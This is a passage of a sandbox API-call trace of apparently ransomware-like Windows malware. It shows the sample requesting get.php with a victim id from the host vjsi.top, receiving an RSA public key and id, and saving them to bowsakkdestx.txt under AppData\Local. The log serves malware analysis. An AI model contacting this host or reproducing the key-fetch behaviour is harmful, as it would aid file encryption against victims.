1 [0112.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f9cc8 | out: hHeap=0x4970000) returned 1 [0112.615] lstrcpyW (in: lpString1=0x13f0af78, lpString2="http://vjsi.top/nddddhsspen6/get.php?pid=333A08A62A835CF5E85B23E934E08F4B" | out: lpString1="http://vjsi.top/nddddhsspen6/get.php?pid=333A08A62A835CF5E85B23E934E08F4B") returned="http://vjsi.top/nddddhsspen6/get.php?pid=333A08A62A835CF5E85B23E934E08F4B" [0112.615] lstrcatW (in: lpString1="http://vjsi.top/nddddhsspen6/get.php?pid=333A08A62A835CF5E85B23E934E08F4B", lpString2="&first=true" | out: lpString1="http://vjsi.top/nddddhsspen6/get.php?pid=333A08A62A835CF5E85B23E934E08F4B&first=true") returned="http://vjsi.top/nddddhsspen6/get.php?pid=333A08A62A835CF5E85B23E934E08F4B&first=true" [0112.615] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://vjsi.top/nddddhsspen6/get.php?pid=333A08A62A835CF5E85B23E934E08F4B&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0112.920] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0x13f0a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x13f0a604 | out: lpBuffer=0x13f0a778*, lpdwNumberOfBytesRead=0x13f0a604*=0x22b) returned 1 [0112.921] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x13f0a670 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0112.922] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0112.922] AreFileApisANSI () returned 1 [0112.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13f0a670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0112.922] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x7a) returned 0x49d1c58 [0112.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13f0a670, cbMultiByte=-1, lpWideCharStr=0x49d1c58, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0112.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x13f0a47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b0 [0112.922] GetFileType (hFile=0x3b0) returned 0x1 [0112.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0112.923] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 555 [0112.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1000) returned 0x74eff28 [0112.923] WriteFile (in: hFile=0x3b0, lpBuffer=0x13f09118*, nNumberOfBytesToWrite=0x22b, lpNumberOfBytesWritten=0x13f08a44, lpOverlapped=0x0 | out: lpBuffer=0x13f09118*, lpNumberOfBytesWritten=0x13f08a44*=0x22b, lpOverlapped=0x0) returned 1 [0112.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74eff28 | out: hHeap=0x4970000) returned 1 [0112.924] CloseHandle (hObject=0x3b0) returned 1 [0112.926] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0112.927] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0112.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f21d8 | out: hHeap=0x4970000) returned 1 [0112.927] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0112.927] lstrcpyA (in: lpString1=0x13f0ab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0112.927] lstrcpyA (in: lpString1=0x13f0a778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0112.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.928] lstrlenA (lpString="-----BEGIN PUBLIC 